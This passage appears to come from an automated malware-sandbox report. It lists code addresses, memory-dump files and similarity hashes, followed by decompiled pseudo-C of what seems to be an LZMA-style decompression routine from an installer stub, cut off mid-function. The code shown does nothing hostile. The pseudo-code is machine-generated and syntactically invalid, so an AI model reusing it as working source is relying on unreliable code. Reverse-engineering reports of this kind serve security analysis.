0x004067df
0x004067e1
0x004067e2
0x004067e5
0x004067e7
0x004067e8
0x004067ea
0x004067ed
0x004067f2
0x004067f7
0x00406800
0x00406813
0x00406816
0x00406822
0x0040684a
0x0040684c
0x0040685a
0x0040685a
0x0040685e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040684e
0x0040684e
0x00406851
0x00406852
0x00406852
0x00000000
0x0040684e
0x00406828
0x0040682d
0x0040682d
0x00406836
0x0040683e
0x00406841
0x00000000
0x00406847
0x00406847
0x00000000
0x00406847
0x00000000
0x00406864
0x00406864
0x00406868
0x00407114
0x00000000
0x00407114
0x00406871
0x00406881
0x00406884
0x00406887
0x00406887
0x00406887
0x0040688a
0x0040688e
0x00000000
0x00000000
0x00406890
0x00406896
0x004068c0
0x004068c6
0x004068cd
0x00000000
0x004068cd
0x0040689c
0x0040689f
0x004068a4
0x004068a4
0x004068af
0x004068b7
0x004068ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068ff
0x00406905
0x00406908
0x00406915
0x0040691d
0x00000000
0x00000000
0x004068d4
0x004068d4
0x004068d8
0x00407123
0x00000000
0x00407123
0x004068e4
0x004068ef
0x004068ef
0x004068ef
0x004068f2
0x004068f5
0x004068f8
0x004068fd
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f94
0x00406f94
0x00406f9a
0x00406fa0
0x00406fa6
0x00406fc0
0x00406fc3
0x00406fc9
0x00406fd4
0x00406fd6
0x00406fa8
0x00406fa8
0x00406fb7
0x00406fbb
0x00406fbb
0x00406fe0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406925
0x00406927
0x0040692a
0x0040699b
0x0040699e
0x004069a1
0x004069a8
0x004069b2
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x0040692c
0x00406930
0x00406933
0x00406935
0x00406938
0x0040693b
0x0040693d
0x00406940
0x00406942
0x00406947
0x0040694a
0x0040694d
0x00406951
0x00406958
0x0040695b
0x00406962
0x00406966
0x0040696e
0x0040696e
0x0040696e
0x00406968
0x00406968
0x00406968
0x0040695d
0x0040695d
0x0040695d
0x00406972
0x00406975
0x00406993
0x00406995
0x00000000
0x00406977
0x00406977
0x0040697a
0x0040697d
0x00406980
0x00406982
0x00406982
0x00406982
0x00406985
0x00406988
0x0040698a
0x0040698b
0x0040698e
0x00000000
0x0040698e
0x00000000
0x00000000
0x00000000
0x00406c2e
0x00406c32
0x00406c55
0x00406c58
0x00406c5b
0x00406c65
0x00406c34
0x00406c34
0x00406c37
0x00406c3a
0x00406c3d
0x00406c4a
0x00406c4d
0x00406c4d
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406c71
0x00406c75
0x00000000
0x00000000
0x00406c7b
0x00406c7f
0x00000000
0x00000000
0x00406c85
0x00406c87
0x00406c8b
0x00406c8b
0x00406c8e
0x00406c92
0x00000000
0x00000000
0x00406ce2
0x00406ce6
0x00406ced
0x00406cf0
0x00406cf3
0x00406cfd
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406ce8
0x00000000
0x00000000
0x00406d09
0x00406d0d
0x00406d14
0x00406d17
0x00406d1a
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d1d
0x00406d20
0x00406d23
0x00406d23
0x00406d26
0x00406d29
0x00406d2c
0x00406d2c
0x00406d2f
0x00406d36
0x00406d3b
0x00000000
0x00000000
0x00406dc9
0x00406dc9
0x00406dcd
0x0040716b
0x00000000
0x0040716b
0x00406dd3
0x00406dd6
0x00406dd9
0x00406ddd
0x00406de0
0x00406de6
0x00406de8
0x00406de8
0x00406de8
0x00406deb
0x00406dee
0x00000000
0x00000000
0x004069be
0x004069be
0x004069c2
0x0040712f
0x00000000
0x0040712f
0x004069c8
0x004069cb
0x004069ce
0x004069d2
0x004069d5
0x004069db
0x004069dd
0x004069dd
0x004069dd
0x004069e0
0x004069e3
0x004069e3
0x004069e6
0x004069e9
0x00000000
0x00000000
0x004069ef
0x004069f5
0x00000000
0x00000000
0x004069fb
0x004069fb
0x004069ff
0x00406a02
0x00406a05
0x00406a08
0x00406a0b
0x00406a0c
0x00406a0f
0x00406a11
0x00406a17
0x00406a1a
0x00406a1d
0x00406a20
0x00406a23
0x00406a26
0x00406a29
0x00406a45
0x00406a48
0x00406a4b
0x00406a4e
0x00406a55
0x00406a59
0x00406a5b
0x00406a5f
0x00406a2b
0x00406a2b
0x00406a2f
0x00406a37
0x00406a3c
0x00406a3e
0x00406a40
0x00406a40
0x00406a62
0x00406a69
0x00406a6c
0x00000000
0x00406a72
0x00000000
0x00406a72
0x00000000
0x00406a77
0x00406a77
0x00406a7b
0x0040713b
0x00000000
0x0040713b
0x00406a81
0x00406a84
0x00406a87
0x00406a8b
0x00406a8e
0x00406a94
0x00406a96
0x00406a96
0x00406a96
0x00406a99
0x00406a9c
0x00406a9c
0x00406a9c
0x00406aa2
0x00000000
0x00000000
0x00406aa4
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abf
0x00406ac2
0x00406ada
0x00406add
0x00406ae0
0x00406ae3
0x00406ae3
0x00406ae6
0x00406aea
0x00406aec
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad5
0x00406ad5
0x00406aef
0x00406af6
0x00406af9
0x00000000
0x00406afb
0x00000000
0x00406afb
0x00406af9
0x00406b00
0x00406b00
0x00406b00
0x00406b00
0x00000000
0x00000000
0x00406b3b
0x00406b3b
0x00406b3f
0x00407147
0x00000000
0x00407147
0x00406b45
0x00406b48
0x00406b4b
0x00406b4f
0x00406b52
0x00406b58
0x00406b5a
0x00406b5a
0x00406b5a
0x00406b5d
0x00406b60
0x00406b60
0x00406b66
0x00406b04
0x00406b04
0x00406b07
0x00000000
0x00406b07
0x00406b68
0x00406b68
0x00406b6b
0x00406b6e
0x00406b71
0x00406b74
0x00406b77
0x00406b7a
0x00406b7d
0x00406b80
0x00406b83
0x00406b86
0x00406b9e
0x00406ba1
0x00406ba4
0x00406ba7
0x00406ba7
0x00406baa
0x00406bae
0x00406bb0
0x00406b88
0x00406b88
0x00406b90
0x00406b95
0x00406b97
0x00406b99
0x00406b99
0x00406bb3
0x00406bba
0x00406bbd
0x00000000
0x00406bbf
0x00000000
0x00406bbf
0x00000000
0x00406e4c
0x00406e4c
0x00406e50
0x00407177
0x00000000
0x00407177
0x00406e56
0x00406e59
0x00406e5c
0x00406e60
0x00406e63
0x00406e69
0x00406e6b
0x00406e6b
0x00406e6b
0x00406e6e
0x00000000
0x00000000
0x00406c1c
0x00406c1c
0x00406c1f
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00000000
0x00406f5b
0x00406f5f
0x00406f81
0x00406f84
0x00406f8e
0x00406f91
0x00406f91
0x00406f91
0x00000000
0x00406f91
0x00406f91
0x00406f61
0x00406f64
0x00406f68
0x00406f6b
0x00406f6b
0x00406f6e
0x00000000
0x00000000
0x00407018
0x0040701c
0x0040703a
0x0040703a
0x0040703a
0x00407041
0x00407048
0x0040704f
0x0040704f
0x00000000
0x0040704f
0x0040701e
0x00407021
0x00407024
0x00407027
0x0040702e
0x00406f72
0x00406f72
0x00406f75
0x00000000
0x00000000
0x00407109
0x0040710c
0x0040700d
0x00000000
0x00000000
0x00406d43
0x00406d45
0x00406d4c
0x00406d4d
0x00406d4f
0x00406d52
0x00000000
0x00000000
0x00406d5a
0x00406d5d
0x00406d60
0x00406d62
0x00406d64
0x00406d64
0x00406d65
0x00406d68
0x00406d6f
0x00406d72
0x00406d80
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x00407060
0x00000000
0x00000000
0x00407065
0x00407065
0x00407069
0x004071a1
0x00000000
0x004071a1
0x0040706f
0x00407072
0x00407075
0x00407079
0x0040707c
0x00407082
0x00407084
0x00407084
0x00407084
0x00407087
0x0040708a
0x0040708a
0x0040708a
0x0040708a
0x0040708d
0x0040708d
0x00407091
0x004070f1
0x004070f4
0x004070f9
0x004070fa
0x004070fc
0x004070fe
0x00407101
0x0040700d
0x0040700d
0x00000000
0x00407013
0x0040700d
0x00407093
0x00407099
0x0040709c
0x0040709f
0x004070a2
0x004070a5
0x004070a8
0x004070ab
0x004070ae
0x004070b1
0x004070b4
0x004070cd
0x004070d0
0x004070d3
0x004070d6
0x004070da
0x004070dc
0x004070dc
0x004070dd
0x004070e0
0x004070b6
0x004070b6
0x004070be
0x004070c3
0x004070c5
0x004070c8
0x004070c8
0x004070e3
0x004070ea
0x00000000
0x004070ec
0x00000000
0x004070ec
0x00000000
0x00406d88
0x00406d8b
0x00406dc1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef1
0x00406ef4
0x00406ef4
0x00406ef7
0x00406ef9
0x00407183
0x00000000
0x00407183
0x00406eff
0x00406f02
0x00000000
0x00000000
0x00406f08
0x00406f0c
0x00406f0f
0x00406f0f
0x00406f0f
0x00000000
0x00406f0f
0x00406d8d
0x00406d8f
0x00406d91
0x00406d93
0x00406d96
0x00406d97
0x00406d99
0x00406d9b
0x00406d9e
0x00406da1
0x00406db7
0x00406dbc
0x00406df4
0x00406df4
0x00406df8
0x00406e24
0x00406e26
0x00406e2d
0x00406e30
0x00406e33
0x00406e33
0x00406e38
0x00406e38
0x00406e3a
0x00406e3d
0x00406e44
0x00406e47
0x00406e74
0x00406e74
0x00406e77
0x00406e7a
0x00406eee
0x00406eee
0x00406eee
0x00000000
0x00406eee
0x00406e7c
0x00406e82
0x00406e85
0x00406e88
0x00406e8b
0x00406e8e
0x00406e91
0x00406e94
0x00406e97
0x00406e9a
0x00406e9d
0x00406eb6
0x00406eb8
0x00406ebb
0x00406ebc
0x00406ebf
0x00406ec1
0x00406ec4
0x00406ec6
0x00406ec8
0x00406ecb
0x00406ecd
0x00406ed0
0x00406ed4
0x00406ed6
0x00406ed6
0x00406ed7
0x00406eda
0x00406edd
0x00406e9f
0x00406e9f
0x00406ea7
0x00406eac
0x00406eae
0x00406eb1
0x00406eb1
0x00406ee0
0x00406ee7
0x00406e71
0x00406e71
0x00406e71
0x00406e71
0x00000000
0x00406ee9
0x00000000
0x00406ee9
0x00406ee7
0x00406dfa
0x00406dfd
0x00406dff
0x00406e02
0x00406e05
0x00406e08
0x00406e0a
0x00406e0d
0x00406e10
0x00406e10
0x00406e13
0x00406e13
0x00406e16
0x00406e1d
0x00406df1
0x00406df1
0x00406df1
0x00406df1
0x00000000
0x00406e1f
0x00000000
0x00406e1f
0x00406e1d
0x00406da3
0x00406da6
0x00406da8
0x00406dab
0x00000000
0x00000000
0x00406b0a
0x00406b0a
0x00406b0e
0x00407153
0x00000000
0x00407153
0x00406b14
0x00406b17
0x00406b1a
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b28
0x00406b2b
0x00406b2e
0x00406b31
0x00406b33
0x00406b33
0x00406b33
0x00000000
0x00000000
0x00406c95
0x00406c95
0x00406c99
0x0040715f
0x00000000
0x0040715f
0x00406c9f
0x00406ca2
0x00406ca5
0x00406ca8
0x00406caa
0x00406caa
0x00406caa
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb9
0x00406cbc
0x00406cbd
0x00406cbf
0x00406cbf
0x00406cbf
0x00406cc2
0x00406cc5
0x00406cc8
0x00406ccb
0x00406ccb
0x00406ccb
0x00406cce
0x00406cd0
0x00406cd0
0x00000000
0x00000000
0x00406f12
0x00406f12
0x00406f12
0x00406f16
0x00000000
0x00000000
0x00406f1c
0x00406f1f
0x00406f22
0x00406f25
0x00406f27
0x00406f27
0x00406f27
0x00406f2a
0x00406f2d
0x00406f30
0x00406f33
0x00406f36
0x00406f39
0x00406f3a
0x00406f3c
0x00406f3c
0x00406f3c
0x00406f3f
0x00406f42
0x00406f45
0x00406f48
0x00406f4b
0x00406f4f
0x00406f51
0x00406f54
0x00000000
0x00406f56
0x00406cd3
0x00406cd3
0x00000000
0x00406cd3
0x00406f54
0x00407189
0x00000000
0x00000000
0x004067b8
0x004071c0
0x004071c0
0x00000000
0x004071c0
0x0040700d
0x00406f94
0x00406f91
0x00000000
0x00406bc8

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
Instruction ID: 28a04b8f37ec13448d59bb684de8c36190a5ca9e173ef22aca7ace3c2f707fcc
Opcode Fuzzy Hash: a790c0330ad62cbb347795bf86deb23ec280a471c33d2e26a689dec21b6fd0bb
Instruction Fuzzy Hash: F2713471D04229CFDF28CF98C8447ADBBB1FB48305F15806AD846BB281C7386996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE2, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406CE2() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071C8))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
